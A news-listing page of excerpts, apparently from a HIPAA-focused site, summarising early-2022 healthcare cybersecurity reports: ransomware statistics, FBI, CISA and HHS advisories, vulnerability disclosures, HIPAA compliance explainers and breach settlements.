A new bill has been proposed by a bipartisan pair of senators that aims to improve the cybersecurity of the healthcare and public health (HPH) sector, in light of the recent warning from the White House about the increased threat of Russian cyber threats. Last week, President Biden and the White House issued a warning about the increased risk of Russian cyberattacks on critical infrastructure, including potential attacks on the HPH sector in response to the sanctions recently imposed by the United States on Russia due to the invasion of Ukraine. The warning was “based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks,” said President Biden. In response to the warning, on Thursday, March 24, 2022, U.S. Senators Jacky Rosen (D-NV) and Bill Cassidy, MD (R-LA) proposed the Healthcare Cybersecurity Act (S.3904). One of the main aims of the act is to improve collaboration between the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Department of Health and Human Services. If passed, CISA would be required...

Read More
FBI: At Least 148 Healthcare Organizations Suffered Ransomware Attacks in 2021
Mar24

FBI: At Least 148 Healthcare Organizations Suffered Ransomware Attacks in 2021

The Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) has released its 2021 Internet Crime Report, which reveals there were at least 649 ransomware attacks on critical infrastructure organizations from June 2021 to December 2021. 14 of the 16 critical infrastructure sectors reported at least one ransomware attack, although the healthcare and public health sector was the worst affected, accounting for 148 of those attacks, followed by financial services with 89 attacks, and the information technology sector with 74. The Conti ransomware gang was the most active in 2021 with 87 reported attacks on critical infrastructure organizations, followed LockBit ransomware (58), and the now-disbanded REvil/Sodinokibi ransomware operation (51). The Conti gang favored targets in critical manufacturing, commercial facilities, and the food and agriculture sectors, LockBit most frequently attacked healthcare and public health, government facilities, and financial services, and REvil targeted healthcare and public health, financial services, and the information technology...

Read More
President Biden Urges Private Sector to Take Immediate Action to Harden Cybersecurity Defenses
Mar23

President Biden Urges Private Sector to Take Immediate Action to Harden Cybersecurity Defenses

Present Biden has issued a warning about the increased threat of cyberattacks by Russian state-sponsored hackers as a result of the economic sanctions imposed on the country in response to the invasion of Ukraine. President Biden said the warning is based on “evolving intelligence that the Russian Government is exploring options for potential cyberattacks.” A few days before President Biden’s warning, the FBI issued an alert warning that hacking groups linked to Russia could target U.S organizations in response to the recently imposed sanctions. Deputy national security adviser Anne Neuberger explained in a White House briefing on Monday that threat actors associated with Russian IP addresses had conducted “preparatory activity” for cyberattacks, such as scanning websites and other Internet-facing systems at 5 US energy firms for exploitable vulnerabilities. Scans have also been conducted on at least 18 other US companies in sectors such as defense and financial services. The FBI said the Russian IP addresses used for scanning have previously been used for destructive cyber...

Read More
How to Become HIPAA Compliant
Mar21

How to Become HIPAA Compliant

If you would like to start doing business with healthcare organizations you will need to know how to become HIPAA compliant, what HIPAA compliance entails, and how you can prove to healthcare organizations that you have implemented all the required safeguards and privacy controls to ensure the confidentiality, integrity, and availability of any protected health information you will be provided with or given access to. How to Become HIPAA Compliant There are no shortcuts if you want to become HIPAA compliant. HIPAA compliance means implementing controls and safeguards to ensure the confidentiality, integrity, and availability of protected health information and developing policies and procedures in line with the Healthcare Insurance Portability and Accountability Act (1996), the HIPAA Privacy Rule (2000), the HIPAA Security Rule (2003), the Health Information Technology for Economic and Clinical Health Act (2009), and the Omnibus Final Rule (2013). To become HIPAA compliant, you will need to study the full text of HIPAA (45 CFR Parts 160, 162, and 164) – which the Department...

Read More
OCR: HIPAA Security Rule Compliance Can Prevent and Mitigate Most Cyberattacks
Mar18

OCR: HIPAA Security Rule Compliance Can Prevent and Mitigate Most Cyberattacks

Healthcare hacking incidents have been steadily rising for a number of years. There was a 45% increase in hacking/IT incidents between 2019 and 2020, and in 2021, 66% of breaches of unsecured electronic protected health information were due to hacking and other IT incidents. A large percentage of those breaches could have been prevented if HIPAA-regulated entities were fully compliant with the HIPAA Security Rule. The Department of Health and Human Services’ Office for Civil Rights explained in its March 2022 cybersecurity newsletter that compliance with the HIPAA Security Rule will prevent or substantially mitigate most cyberattacks. Most cyberattacks on the healthcare industry are financially motivated and are conducted to steal electronic protected health information or encrypt patient data to prevent legitimate access. The initial access to healthcare networks is gained via tried and tested methods such as phishing attacks and the exploitation of known vulnerabilities and weak authentication protocols, rather than exploiting previously unknown vulnerabilities. Prevention of...

Read More
Russian State-Sponsored Actors are Exploiting MFA and the PrintNightmare Vulnerability
Mar17

Russian State-Sponsored Actors are Exploiting MFA and the PrintNightmare Vulnerability

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have issued a joint cybersecurity advisory warning that Russian state-sponsored actors are exploiting default multi-factor authentication protocols and the PrintNightmare vulnerability to gain access to networks to steal sensitive data. These tactics have been used by Russian state-sponsored cyber actors from as early as May 2021, when a non-governmental organization (NGO) was attacked using these tactics. The threat actors were able to gain access to the network by exploiting default multi-factor authentication protocols (Cisco’s Duo MFA) on an account. The threat actors then exploited the PrintNightmare vulnerability to execute code with system privileges and were able to move laterally to the NGO’s cloud and email accounts and exfiltrated documents. PrintNightmare is a critical remote code execution vulnerability (CVE-2021-34527) in the print spooler service of Microsoft Windows. The attackers were able to enroll a new device in the NGO’s Duo MFA using compromised...

Read More
Healthcare Scores Poorly for Practicing the Cyber Incident Response
Mar15

Healthcare Scores Poorly for Practicing the Cyber Incident Response

2021 was another record-breaking year for healthcare industry data breaches with over 50 million records breached and over 900 data breaches were recorded by databreaches.net. Given the extent to which the healthcare industry is targeted by cyber actors, the risk of a data breach occurring is high. A SecureLink/Ponemon Institute study in 2021 found 44% of healthcare and pharmaceutical companies experienced a data breach in the past 12 months. While steps can be taken to improve defenses to prevent cyberattacks from succeeding, healthcare organizations need to be prepared for the worse and should have an incident response plan in place that can be immediately initiated in the event of a cyberattack. With proper planning, when a cyberattack occurs, healthcare organizations will be well prepared and will be able to recover in the shortest possible time frame. Regular exercises should be conducted to ensure everyone is aware of their responsibilities and that the plan works. All too often, victims of cyberattacks discover their incident response plan is inefficient or ineffective due...

Read More
How to Secure Patient Information (PHI)
Mar13

How to Secure Patient Information (PHI)

HIPAA requires healthcare organizations of all sizes to secure protected health information (PHI), but how can covered entities secure patient information? If you are asked how you secure patient information, could you provide an answer? How Can You Secure Patient Information? HIPAA requires healthcare organizations and their business associates to implement safeguards to ensure the confidentiality, integrity, and availability of PHI, although there is little detail provided on how to secure patient information in HIPAA regulations. This is intentional, as the pace that technology is advancing is far greater than the speed at which HIPAA can be updated. If details were included, they would soon be out of date. Technology is constantly changing and new vulnerabilities are being discovered in systems and software previously thought to be secure. Securing patient information is therefore not about implementing security solutions and forgetting about them. To truly secure patient information you must regularly review your security controls, update policies and procedures, maintain...

Read More
Breach Barometer Report Shows Over 50 Million Healthcare Records Were Breached in 2021
Mar11

Breach Barometer Report Shows Over 50 Million Healthcare Records Were Breached in 2021

Protenus has released its 2022 Breach Barometer Report which confirms 2021 was a particularly bad year for healthcare industry data breaches, with more than 50 million healthcare records exposed or compromised in 2021. The report includes healthcare data breaches reported to regulators, as well as data breaches that have been reported in the media, incidents that have not been disclosed by the breached entity, and data breaches involving healthcare data at non-HIPAA-regulated entities. The data for the report was provided by databreaches.net. Protenus has been releasing annual Breach Barometer reports since 2016, and the number of healthcare data breaches has increased every year, with the number of breached records increasing every year since 2017. In 2021, it has been confirmed that at least 50,406,838 individuals were affected by healthcare data breaches, a 24% increase from the previous year. 905 incidents are included in the report, which is a 19% increase from 2020. The largest healthcare data breach of the year occurred affected Florida Healthy Kids Corporation, a...

Read More
Warning Issued About Access:7 Vulnerabilities Affecting IoT and Medical Devices
Mar09

Warning Issued About Access:7 Vulnerabilities Affecting IoT and Medical Devices

7 vulnerabilities dubbed Access:7 have been identified in the web-based technologies PTC Axeda and Axeda Desktop Server, which are used to allow one or more people to securely view and operate the same remote desktop via the Internet. If exploited, an attacker could gain full system access, remotely execute code, trigger a denial-of-service condition, read and change configurations, and obtain file system read access and log information access. Three of the vulnerabilities are rated critical and have a CVSS severity score of 9.8 out of 10. PTC Axeda and Axeda Desktop Server are remote asset connectivity software solutions that are used as part of a cloud-based IoT platform. The software is extensively used in medical and Internet-of-Things (IoT) devices to manage and remotely access connected devices, including multiple medical imaging and laboratory devices. At present, none of the vulnerabilities are believed to have been exploited in the wild. The vulnerabilities affect all versions of the software. They are: CVE-2022-25246 – Hard-coded credentials – CVSS Severity Score 9.8/10...

Read More
HC3 Report Reveals Cyberattack Trends and Provides Insights to Improve Healthcare Cybersecurity
Mar08

HC3 Report Reveals Cyberattack Trends and Provides Insights to Improve Healthcare Cybersecurity

The HHS’ Health Sector Cybersecurity Coordination Center has released a new report – Health Sector Cybersecurity: 2021 – Retrospective and 2022 Look Ahead – that provides a retrospective look at healthcare cybersecurity over the past 3 decades, detailing some of the major cyberattacks to hit the healthcare industry starting with the first-ever ransomware attack in 1989. That incident saw Biologist Joseph Popp distribute 20,000 floppy disks at the World Health Organization AIDS conference in Stockholm. When used, the disks installed malicious code which tracked reboots. After 90 reboots, a ransom note was displayed that claimed the software lease had expired and a payment of $189 was required to regain access to the system. The report shows how adversaries stepped up their attacks on the healthcare industry from 2014 through 2017. In 2014, Boston Children’s Hospital suffered a major distributed Denial of Service (DDoS) attack, there was a massive cyberattack on Anthem Inc. in 2015 that resulted in the unauthorized accessing of the records of 80 million health plan...

Read More
HSCC Releases Model Contract Template for HDOs and Medical Device Manufacturers
Mar07

HSCC Releases Model Contract Template for HDOs and Medical Device Manufacturers

The Healthcare and Public Health Sector Coordinating Council (HSCC) has published a new Model Contract Language template for healthcare delivery organizations (HDOs) to use when procuring new devices from medical device manufacturers (MDMs) to ensure each party is aware of its responsibilities for cybersecurity and device management. “Medical device cybersecurity responsibility and accountability between MDMs and HDOs is complicated by many conflicting factors, including uneven MDM capabilities and investment in cybersecurity controls built into device design and production; varying expectations for cybersecurity among HDOs; and high cybersecurity management costs in the HDO operational environment through the device lifecycle,” explained HSCC. “These factors have introduced and sustained ambiguities in cybersecurity accountability between MDMs and HDOs that historically have been reconciled at best inconsistently in the purchase contract negotiation process, leading to downstream disputes and potential patient safety implications.” The Model Contract Language is intended to be a...

Read More
Poor Employee Cyber Hygiene is Putting Healthcare Cybersecurity at Risk
Mar07

Poor Employee Cyber Hygiene is Putting Healthcare Cybersecurity at Risk

There have been calls for healthcare organizations to take steps to improve security due to a major rise in hacking incidents, ransomware attacks, and vulnerability disclosures in 2021. Record numbers of healthcare data breaches were reported last year, and tens of millions of healthcare records were compromised. Adhering to the minimum requirements of the HIPAA Security Rule and conducting risk analyses, having robust risk management practices, conducting vulnerability scans, and implementing technical safeguards such as intrusion prevention systems, next-generation firewalls, and spam filters are all important measures to improve cybersecurity and ensure HIPAA compliance, but it is also important to improve the human aspect of cybersecurity. Risky employee behaviors need to be eradicated and the workforce needs to be trained to be more security-aware and taught how to recognize common attacks that target individuals, such as phishing and social engineering. The human aspect of cybersecurity is often one of the weakest links in the security chain, which has been highlighted by a...

Read More
Security Issues Identified in 75% of Infusion Pumps
Mar04

Security Issues Identified in 75% of Infusion Pumps

This week, researchers at Palo Alto’s Unit 42 team published a report that shows security gaps and vulnerabilities often exist in smart infusion pumps. These bedside devices automate the delivery of medications and fluids to patients and are connected to networks to allow them to be remotely managed by hospitals. The researchers used crowdsourced scans from more than 200,000 infusion pumps at hospitals and other healthcare organizations and searched for vulnerabilities and security gaps that could potentially be exploited. The devices were assessed against more than 40 known vulnerabilities and over 70 other IoT vulnerabilities. 75% of the 200,000 infusion pumps were discovered to have security gaps that placed them at an increased risk of being compromised by hackers. Worryingly, 52% of the analyzed devices were found to be vulnerable to two serious infusion pump vulnerabilities dating back to 2019, one of which is a critical flaw with a CVSS severity score of 9.8 out of 10 (Wind River VxWorks CVE-2019-12255), and the other is a high severity flaw with a CVSS score of 7.1 (Wind...

Read More
Paying a Ransom Doesn’t Put an End to the Extortion
Mar02

Paying a Ransom Doesn’t Put an End to the Extortion

The healthcare industry has been extensively targeted by ransomware gangs and victims often see paying the ransom as the best option to ensure a quick recovery, but the payment does not always put an end to the extortion. Many victims have paid the ransom to obtain the decryption keys or to prevent the publication of stolen data, only for the ransomware actors to continue with the extortion. The advice of the Federal Bureau of Investigation (FBI) is never to pay a ransom following a ransomware attack, as doing allows the threat actors to put more resources into their attacks, it encourages other threat groups to get involved in ransomware, and because there is no guarantee that paying a ransom will allow the recovery of data or prevent the misuse of stolen data. A recent survey conducted by the cybersecurity firm Venafi has helped to quantify the extent to which further extortion occurs. The survey has provided some important statistics about what happens when victims pay or do not pay the ransom demands. The survey was conducted on 1,506 IT security officers from the United...

Read More
HHS Warns of Potential Threats to the Healthcare Sector
Mar02

HHS Warns of Potential Threats to the Healthcare Sector

The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has issued a warning to the U.S. health sector about potential cyber threats that could spillover from the conflict in Ukraine and affect U.S. healthcare organizations. HC3 said the HHS is unaware of any specific threats to the Health and Public Health (HPH) Sector; however, it is clear that allies on both sides of the conflict have cyber capabilities and there are fears that there could be cyberattacks on the HPH sector as a consequence of the conflict. HC3 has warned that threats could come from three areas: Threat actors linked to the Russian government, threat actors linked to the Belarussian government, and cybercriminal groups operating out of Russia and its neighboring states. There is also potential for other cybercriminal groups to either get involved in the conflict or take advantage of the conflict to conduct unrelated cyberattacks. “Russia has for several decades been one of the most capable cyber powers in the world. Going back to the Moonlight Maze attacks against the US...

Read More
OCR Director Encourages HIPAA-Regulated Entities to Strengthen Their Cybersecurity Posture
Mar01

OCR Director Encourages HIPAA-Regulated Entities to Strengthen Their Cybersecurity Posture

In a recent blog post, Director of the HHS’ Office for Civil Rights, Lisa J. Pino, urged HIPAA-regulated entities to take steps to strengthen their cybersecurity posture in 2022 in light of the increase in cyberattacks on the healthcare industry. 2021 was a particularly bad year for healthcare organizations, with the number of reported healthcare data breaches reaching record levels. 714 healthcare data breaches of 500 or more records were reported to the HHS’ Office for Civil Rights in 2021 and more than 45 million records were breached. The breach reports were dominated by hacking and other IT incidents that resulted in the exposure or theft of the healthcare data of more than 43 million individuals. In 2021, hackers took advantage of healthcare organizations dealing with the COVID-19 pandemic and conducted several attacks that had a direct impact on patient care and resulted in canceled surgeries, medical examinations, and other services as a result of IT systems being taken offline and network access being disabled. Pino also drew attention to the critical vulnerability...

Read More
NIST Requests Comments on How to Improve its Cybersecurity Framework
Feb28

NIST Requests Comments on How to Improve its Cybersecurity Framework

The National Institute of Standards and Technology (NIST) is seeking feedback on the usefulness of its Framework for Improving Critical Infrastructure Cybersecurity (NIST Cybersecurity Framework) and suggestions on any improvements that can be made. The NIST Cybersecurity Framework was released in 2014 to help public and private sector organizations implement cybersecurity standards and best practices to improve their cybersecurity posture, better defend against cyber threats, and quickly identify and respond to cyberattacks in progress to limit the harm that can be caused. The NIST Cybersecurity Framework is considered the gold standard for cyber threat management; however, that does not mean improvements could not be made. The last update to the Cybersecurity Framework occurred in April 2018 and the past four years have seen considerable changes to the cybersecurity threat landscape. New threats have emerged, the tactics, techniques, and procedures used by cyber threat actors have changed, there are new technologies and security capabilities, and more resources are available to...

Read More
NCCoE Releases Final Version of NIST Securing Telehealth Remote Patient Monitoring Ecosystem Guidance
Feb23

NCCoE Releases Final Version of NIST Securing Telehealth Remote Patient Monitoring Ecosystem Guidance

The National Cybersecurity Center of Excellence (NCCoE) has published the final version of NIST guidance on Securing Telehealth Remote Patient Monitoring Ecosystem (SP 1800-30). Healthcare delivery organizations have been increasingly adopting telehealth and remote patient monitoring (RPM) systems to improve the care they provide to patients while reducing costs. Patient monitoring systems have traditionally only been used in healthcare facilities but there are advantages to using these solutions in patients’ homes. Many patients prefer to receive care at home, the cost of receiving that care is reduced, and healthcare delivery organizations benefit from freeing up bed space and being able to treat more patients. While there are advantages to be gained from the provision of virtual care and the remote monitoring of patients in their homes, telehealth and RPM systems can introduce vulnerabilities that could put sensitive patient data at risk and if RPM systems are not adequately protected, they could be vulnerable to cyberattacks that could disrupt patient monitoring services....

Read More
CISA Publishes List of Free Cybersecurity Tools to Advance Security Capabilities
Feb23

CISA Publishes List of Free Cybersecurity Tools to Advance Security Capabilities

Expanding security capabilities is possible with a tight budget by using free cybersecurity tools and services. Many tools and services have been developed by government agencies, the cybersecurity community, and the public and private sector that can be used to improve defenses against damaging cyberattacks, detect potential intrusions rapidly, and help organizations respond to and remediate security breaches. Finding appropriate free cybersecurity tools and services can be a time-consuming process. To help critical infrastructure organizations reduce cybersecurity risk, the DHS’ Cybersecurity and Infrastructure Security Agency (CISA) has compiled a list of services provided by CISA and other government agencies, open source tools, and tools and services developed and maintained by the cybersecurity community that can be adopted to improve protection, detection, response and the remediation of cyber threats. The list of free cybersecurity tools and services is divided into four categories, based on the four goals detailed in previously published guidance: CISA Insights:...

Read More
HHS Raises Awareness of Threats to Electronic Health Record Systems
Feb21

HHS Raises Awareness of Threats to Electronic Health Record Systems

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center has issued a threat brief warning about the risks associated with electronic health record systems, which are often targeted by cyber threat actors. Cyberattacks on EHRs can be extremely profitable for cyber threat actors. EHRs usually contain all the information required for multiple types of fraud, including names, addresses, dates of birth, Social Security numbers, other government and state ID numbers, health data, and health insurance information. No other records provide such a wide range of information. The information contained in the systems has a high value on the black market and can be easily sold to cybercriminals who specialize in identity theft, tax, and insurance fraud. Malware, and especially ransomware, pose a significant threat to EHRs. Ransomware can be used to encrypt EHR data to prevent access, which causes disruption to medical services and creates patient safety issues, which increases the likelihood of the ransom being paid. Phishing attacks to gain access to...

Read More
2021 Saw Sharp Increase in Ransomware Data Leaks and Ransom Demands
Feb18

2021 Saw Sharp Increase in Ransomware Data Leaks and Ransom Demands

CrowdStrike has released its annual threat report which shows there was a major increase in data leaks following ransomware attacks in 2021, rising 82% from 2020. CrowdStrike observed 2,686 ransomware attacks in 2021 compared to 1,474 in 2020. There were more than 50 ransomware attacks a week in 2021. Ransomware gangs also increased their ransom demands in 2021, which were 36% higher than in 2020. In 2021, the average ransom demand was $6.1 million. The healthcare industry was extensively targeted by ransomware gangs in 2021, even though several threat actors claimed they would not conduct attacks on healthcare organizations. CrowdStrike tracked 154 ransomware attacks on healthcare organizations in 2021, up from 94 in 2020, with healthcare ranking 6th out of all industry sectors for data leaks, down from 4th position in 2020. CrowdStrike said the threat landscape became much more crowded in 2021, with several new adversaries emerging including threat actors that have previously not been extensively involved in cyberattacks such as Turkey and Colombia. CrowdStrike identified 21 new...

Read More
HIMSS Cybersecurity Survey Suggests the Human Factor is the Largest Vulnerability in Healthcare
Feb17

HIMSS Cybersecurity Survey Suggests the Human Factor is the Largest Vulnerability in Healthcare

The Healthcare Information and Management Systems Society (HIMSS) has published the findings of its 2021 Healthcare Cybersecurity Survey which revealed 67% of respondents have experienced at least one significant security incident in the past 12 months, with the most significant security breaches the result of phishing attacks. The 2021 HIMSS Healthcare Cybersecurity Survey was conducted on 167 healthcare cybersecurity professionals, who had at least some responsibility for day-to-day cybersecurity operations or oversight. The surveyed IT professionals were asked about the most significant security breaches they had experienced in the previous 12 months, and in 45% of cases it was a phishing attack, and 57% of respondents said the most significant breach involved phishing. Phishing attacks are most commonly conducted via email, with email-based phishing attacks accounting for 71% of the most significant security incidents; however, 27% said there was a significant voice phishing incident (vishing), 21% said they had a significant SMS phishing incident (smishing), and 16% said there...

Read More
CISA, FBI, NSA Warn of Increased Threat of Ransomware Attacks on Critical Infrastructure
Feb14

CISA, FBI, NSA Warn of Increased Threat of Ransomware Attacks on Critical Infrastructure

A joint security advisory has been issued by cybersecurity agencies in the United States, United Kingdom, and Australia, warning about the increased globalized threat of ransomware attacks and the elevated risk of targeted attacks on critical infrastructure entities. The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have observed high-impact ransomware attacks against 14 of the 16 critical infrastructure sectors in 2021, including government facilities, financial services, transportation systems, water and wastewater systems, energy, and healthcare and public health. The UK’s National Cyber Security Centre (NCSC-UK) says ransomware is now the biggest cyber threat faced by the country, with education the most targeted sector. There has also been an increase in attacks on businesses, charities, law firms, local government public services, and the healthcare sector. The Australian Cyber Security Centre (ACSC) says ransomware gangs are targeting critical infrastructure sectors including...

Read More
What is Considered PHI?
Feb13

What is Considered PHI?

In response to questions sent to HIPAA Journal, we have written a series of posts explaining some of the basic elements of HIPAA, the latest being what is considered PHI? What is PHI, PII, and IIHA? Terms such as PHI and PII are commonly referred to in healthcare, but what do they mean and what information do they include? PHI is an acronym of Protected Health Information, while PII is an acronym of Personally Identifiable Information. Before explaining these terms, it is useful to first explain what is meant by health information, of which protected health information is a subset. Health information is information related to the provision of healthcare or payment for healthcare services that is created or received by a healthcare provider, public health authority, healthcare clearinghouse, health plan, business associate of a HIPAA-covered entity, or a school/university or employer. Health information relates to past, present, and future health conditions or physical/mental health that is related to the provision of healthcare services or payment for those services. Personally...

Read More
Immediate Patching Required to Fix Critical SAP Vulnerabilities
Feb10

Immediate Patching Required to Fix Critical SAP Vulnerabilities

The German business software provider SAP has released patches to fix a set of critical vulnerabilities that affect SAP applications that use the SAP Internet Communications Manager (ICM). The vulnerabilities were identified by researchers at Onapsis Research Labs, who dubbed the flaws ICMAD (Internet Communications Manager Advanced Desync). All three of the flaws could be exploited to achieve remote code execution, which would allow remote attackers to fully compromise vulnerable SAP applications. The vulnerabilities affect the following SAP applications: SAP NetWeaver AS ABAP ABAP Platform SAP NetWeaver AS Java SAP Content Server 7.53 SAP Web Dispatcher The flaws could be exploited to steal victim sessions and credentials in plaintext, change the behavior of applications, obtain PHI and sensitive business data, and cause denial-of-service. The vulnerability CVE-2022-22536 is the most serious of the three and has been assigned the maximum CVSS severity score of 10/10. Onapsis said the flaw can be easily exploited by an unauthenticated attacker on SAP applications in the default...

Read More
Latest Phishing Kits Allow Multi-Factor Authentication Bypass
Feb09

Latest Phishing Kits Allow Multi-Factor Authentication Bypass

Phishing attacks allow threat actors to obtain credentials, but multi-factor authentication (MFA) makes it harder for phishing attacks to succeed. With MFA enabled, in addition to a username and password, another method of authentication is required before account access is granted. Microsoft has previously said multi-factor authentication blocks 99.9% of automated account compromise attacks; however, MFA does not guarantee protection. A new breed of phishing kit is being increasingly used to bypass MFA. Researchers at Proofpoint explained in a recent blog post that phishing kits are now being used that leverage transparent reverse proxy (TRP), which allows browser man-in-the-middle (MitM) attacks. The phishing kits allow the attackers to compromise browser sessions and steal credentials and session cookies in real-time, allowing a full account takeover without alerting the victim. There are multiple phishing kits that can often be purchased for a low cost that allow MFA to be bypassed; some are simple with no-frills functionality, while others are more sophisticated and...

Read More
HC3: Lessons Learned from the Ransomware Attack on Ireland’s Health Service Executive
Feb08

HC3: Lessons Learned from the Ransomware Attack on Ireland’s Health Service Executive

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has released a report providing insights into the May 2021 Conti ransomware attack on the Health Service Executive (HSE) in Ireland, and advice for healthcare and public health organizations to help them prepare, respond, and recover from ransomware attacks. The report provides information on the vulnerabilities and weaknesses that were exploited by the Conti ransomware gang, and how the HSE’s lack of preparedness for ransomware attacks hampered its efforts to detect, respond and remediate the attack and contributed to the long and expensive recovery process. The Conti ransomware gang, believed to be a reincarnation of the notorious Ryuk ransomware operation, first gained access to the HSE network on May 7, 2021, and the networks of six voluntary hospitals and one statutory hospital were compromised between May 8, 2021, and May 12, 2021. One of the affected hospitals detected the attack on May 10, and the HSE was alerted to the cyberattack on May 12. Between May 12 and May 13, the attacker accessed files and...

Read More
FBI Shares Technical Details of Lockbit 2.0 Ransomware
Feb08

FBI Shares Technical Details of Lockbit 2.0 Ransomware

The Federal Bureau of Investigation (FBI) has released indicators of compromise (IoCs) and details of the tactics, techniques, and procedures (TTPs) associated with Lockbit 2.0 ransomware. Lockbit is a ransomware-as-a-service (RaaS) operation that has been active since September 2019. In the summer of 2021, a new version of the ransomware – Lockbit 2.0 – was released that had more advanced features, including the ability to automatically encrypt files across Windows domains via Active Directory group policies, and a Linux based malware was also developed that could exploit vulnerabilities in VMware ESXi virtual machines. The affiliates working for the ransomware operation use a  range of TTPs in their attacks, which makes prevention, detection, and mitigation a challenge for security teams. Initial access is gained by exploiting unpatched vulnerabilities, using zero-day exploits, and purchasing access to business networks from initial access brokers (IABs). Shortly after the relaunch of the RaaS, the threat actor started advertising on hacking forums trying to recruit...

Read More
Unpatched Vulnerabilities are the Most Common Attack Vector Exploited by Ransomware Actors
Feb04

Unpatched Vulnerabilities are the Most Common Attack Vector Exploited by Ransomware Actors

Ransomware gangs are increasingly targeting unpatched vulnerabilities in software and operating systems to gain access to business networks, and they are weaponizing zero-day vulnerabilities at record speed. Unpatched vulnerabilities are now the primary attack vector in ransomware attacks, according to Ivanti’s Ransomware End of Year Spotlight report. Ivanti partnered with Certifying Numbering Authority (CNA) Cyber Security Works and the next-gen SOAR and threat intelligence solution provider Cyware for its report, which identified 32 new ransomware variants in 2021 – An increase of 26% from the previous year. There are know 157 known ransomware families that are being used in cyberattacks on businesses. Ivanti says 65 new vulnerabilities were identified in 2021 that are known to have been exploited by ransomware gangs – an increase of 29% year-over-year – bringing the total number of vulnerabilities tied to ransomware attacks to 288. 37% of the new vulnerabilities were trending on the dark web and have been exploited in multiple attacks, and 56% of the 223 older...

Read More
HC3:  BlackMatter Ransomware Threat Level Reduced
Feb03

HC3: BlackMatter Ransomware Threat Level Reduced

In September 2021, the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) issued an advisory to the health sector about an elevated threat of BlackMatter ransomware attacks. A few days ago, a second advisory was issued stating the threat level has been reduced to Blue/Guarded. HC3 said the ransomware-as-a-service (RaaS) operation appears to have been shut down and there have been no further victims listed on the BlackMatter RaaS data leak site since October 31, 2021. The BlackMatter ransomware operation is believed by many security experts to be a rebranding of the DarkSide ransomware gang, which conducted the ransomware attack on Colonial Pipeline in May 2021 that disrupted fuel delivery to the Eastern Seaboard. The DarkSide operation was shut down shortly after the Colonial Pipeline attack, and BlackMatter ransomware attacks started in July 2021. Approximately half of the attacks conducted by the BlackMatter ransomware gang were on entities based in the United States, including at least four healthcare organizations – A...

Read More
Technologies Supporting Telehealth Have Placed Healthcare Data at Risk
Feb02

Technologies Supporting Telehealth Have Placed Healthcare Data at Risk

A new report from Kaspersky shows the massive increase in telehealth has placed healthcare data at risk. Vulnerabilities have been found in the technologies that support telemedicine, many of which have not yet been addressed. Massive Increase in the Use of Telehealth The COVID-19 pandemic has led to an increase in virtual visits, with healthcare providers increasing access to telehealth care to help curb infections and cut costs. Virtual visits are conducted via the telephone, video-conferencing apps, and other platforms, and a host of new technologies and products such as wearable devices for measuring vital signs, implanted sensors, and cloud services are also being used to support telehealth. Data from McKinsey shows telemedicine usage has increased by 38% since before the emergence of SARS-Cov-2 and COVID-19, and the CDC reports that between June 26, 2020, and November 6, 2020, around 30% of all consultations with doctors were taking place virtually.  Kaspersky says that its own data indicate 91% of healthcare providers around the world have implemented the technology to give...

Read More
Settlement Reached in Excellus Class Action Data Breach Lawsuit
Jan26

Settlement Reached in Excellus Class Action Data Breach Lawsuit

Excellus Health Plan Inc., its affiliated companies, and the Blue Cross Blue Shield Association (BCBSA) have reached a settlement to resolve a class action lawsuit that was filed in relation to a cyberattack discovered in 2015. The attack involved the personally identifiable information (PII) and protected health information (PHI) of more than 10 million members, subscribers, insureds, patients, and customers. The cyberattack was detected on August 5, 2015, by a cybersecurity firm that was hired to assess Excellus’s information technology system. The subsequent investigation by Excellus and cybersecurity firm Mandiant determined hackers had first gained access to its systems on or before December 23, 2013. Evidence was found that indicated the hackers were active within its network until Aug. 18, 2014, after which no traces of activity were found; however, malware had been installed which gave the attackers access to its network until May 11, 2015. On that date, something happened that prevented the hackers from accessing its network. It took Excellus 17 months from the...

Read More
New York Fines EyeMed $600,000 for 2.1 Million-Record Data Breach
Jan25

New York Fines EyeMed $600,000 for 2.1 Million-Record Data Breach

The first settlement of 2022 to resolve a healthcare data breach has been announced by New York Attorney General Letitia James. The Ohio-based vision benefits provider EyeMed Vision Care has agreed to pay a financial penalty of $600,000 to resolve a 2020 data breach that saw the personal information of 2.1 million individuals compromised nationwide, including the personal information of 98,632 New York residents. The data breach occurred on or around June 24, 2020, and saw unauthorized individuals gain access to an EyeMed email account that contained sensitive consumer data provided in connection with vision benefits enrollment and coverage. The attacker had access to the email account for around a week and was able to view emails and attachments spanning a period of 6 years dating back to January 3, 2014. The emails contained a range of sensitive information including names, contact information, dates of birth, account information for health insurance accounts, full or partial Social Security numbers, Medicare/Medicaid numbers, driver’s license numbers, government ID numbers,...

Read More
More Than Half of All Healthcare IoT Devices Have a Known, Unpatched Critical Vulnerability
Jan24

More Than Half of All Healthcare IoT Devices Have a Known, Unpatched Critical Vulnerability

A recent study by the healthcare IoT security platform provider Cynerio has revealed 53% of connected medical devices and other healthcare IoT devices have at least one unaddressed critical vulnerability that could potentially be exploited to gain access to networks and sensitive data or affect the availability of the devices. The researchers also found a third of bedside healthcare IoT devices have at least one unpatched critical vulnerability that could affect service availability, data confidentiality, or place patient safety in jeopardy. The researchers analyzed the connected device footprints at more than 300 hospitals to identify risks and vulnerabilities in their Internet of Medical Things (IoMT) and IoT devices. IV pumps are the most commonly used healthcare IoT device, making up around 38% of a hospital’s IoT footprint. It is these devices that were found to be the most vulnerable to attack, with 73% having a vulnerability that could threaten patient safety, service availability, or result in data theft. 50% of VOIP systems contained vulnerabilities, with ultrasound...

Read More
Healthcare Cybersecurity Risks in 2022
Jan24

Healthcare Cybersecurity Risks in 2022

